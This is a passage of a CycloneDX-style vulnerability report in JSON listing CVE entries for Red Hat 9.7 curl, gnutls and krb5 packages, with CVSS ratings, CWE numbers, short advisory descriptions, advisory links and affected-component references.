"urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-3805", "ratings": [ { "source": { "name": "julia" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 6.3, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 416 ], "description": "When doing a second SMB request to the same host again, curl would wrongly use\na data pointer pointing into already freed memory.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-3805" }, { "url": "http://www.openwall.com/lists/oss-security/2026/03/11/4" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-3805" }, { "url": "https://curl.se/docs/CVE-2026-3805.html" }, { "url": "https://curl.se/docs/CVE-2026-3805.json" }, { "url": "https://github.com/advisories/GHSA-2289-hhfc-p684" }, { "url": "https://hackerone.com/reports/3591944" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3805" }, { "url": "https://ubuntu.com/security/notices/USN-8084-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-3805" } ], "published": "2026-03-11T11:16:00+00:00", "updated": "2026-03-12T14:08:56+00:00", "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-3832", "ratings": [ { "source": { "name": "redhat" }, "score": 3.7, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], "cwes": [ 179 ], "description": "A flaw was found in gnutls. A remote attacker could exploit this vulnerability by presenting a specially crafted Online Certificate Status Protocol (OCSP) response during a TLS handshake. Due to a logic error in how gnutls processes multi-record OCSP responses, a client with OCSP verification enabled may incorrectly accept a revoked server certificate, potentially leading to a compromise of trust.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-3832" }, { "url": "https://access.redhat.com/errata/RHSA-2026:13274" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-3832" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445762" }, { "url": "https://gitlab.com/gnutls/gnutls/-/issues/1801" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3832" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-3832" } ], "published": "2026-04-30T18:16:30+00:00", "updated": "2026-05-11T19:15:57+00:00", "affects": [ { "ref": "pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.8.3-10.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-3833", "ratings": [ { "source": { "name": "nvd" }, "score": 7.4, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "source": { "name": "redhat" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ], "cwes": [ 178 ], "description": "A flaw was found in gnutls. This vulnerability occurs because gnutls performs case-sensitive comparisons of `nameConstraints` labels, specifically for `dNSName` (DNS) or `rfc822Name` (email) constraints within `excludedSubtrees` or `permittedSubtrees`. A remote attacker can exploit this by crafting a leaf certificate with casing differences in the Subject Alternative Name (SAN), leading to a policy bypass where a certificate that should be rejected is instead accepted. This could result in unauthorized access or information disclosure.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-3833" }, { "url": "https://access.redhat.com/errata/RHSA-2026:13274" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-3833" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445763" }, { "url": "https://gitlab.com/gnutls/gnutls/-/issues/1803" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3833" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-3833" } ], "published": "2026-04-30T18:16:30+00:00", "updated": "2026-05-07T02:09:04+00:00", "affects": [ { "ref": "pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "3.8.3-10.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-40355", "ratings": [ { "source": { "name": "redhat" }, "score": 5.9, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "cwes": [ 476 ], "description": "In MIT Kerberos 5 (aka krb5) before 1.22.3, there is a NULL pointer dereference if an application calls gss_accept_sec_context() on a system with a NegoEx mechanism registered in /etc/gss/mech. An unauthenticated remote attacker can trigger this, causing the process to terminate in parse_nego_message.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-40355" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-40355" }, { "url": "https://cems.fun/2026/04/27/krb5-two-unauthenticated-network-vulnerabilities.html" }, { "url": "https://github.com/krb5/krb5/commit/2e75f0d9362fb979f5fc92829431a590a130929f" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40355" }, { "url": "https://web.mit.edu/kerberos/advisories/" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-40355" } ], "published": "2026-04-28T06:16:03+00:00", "updated": "2026-04-28T20:11:56+00:00", "affects": [ { "ref": "pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "1.21.1-8.el9_6", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/krb5-pkinit@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "1.21.1-8.el9_6", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/krb5-workstation@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "1.21.1-8.el9_6", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libkadm5@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "1.21.1-8.el9_6", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/krb5-workstation@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libkadm5@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-40356", "ratings": [ { "source": { "name": "redhat" }, "score": 5.9, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "cwes": [ 191 ], "description": "In MIT Kerberos 5 (aka krb5) before 1.22.3, there is an integer underflow and resultant out-of-bounds read if an application calls gss_accept_sec_context() on a system with a NegoEx mechanism registered in /etc/gss/mech. An unauthenticated remote attacker can trigger this, possibly causing the process to terminate in parse_message.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-40356" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-40356" }, { "url": "https://cems.fun/2026/04/27/krb5-two-unauthenticated-network-vulnerabilities.html" }, { "url": "https://github.com/krb5/krb5/commit/2e75f0d9362fb979f5fc92829431a590a130929f" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40356" }, { "url": "https://web.mit.edu/kerberos/advisories/" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-40356" } ], "published": "2026-04-28T07:16:03+00:00", "updated": "2026-04-28T20:11:56+00:00", "affects": [ { "ref": "pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "1.21.1-8.el9_6", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/krb5-pkinit@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "1.21.1-8.el9_6", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/krb5-workstation@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "1.21.1-8.el9_6", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libkadm5@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "1.21.1-8.el9_6", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/krb5-workstation@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libkadm5@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-4046", "ratings": [ { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 5.3, "severity": "medium", "method": "CVSSv31", "vector": 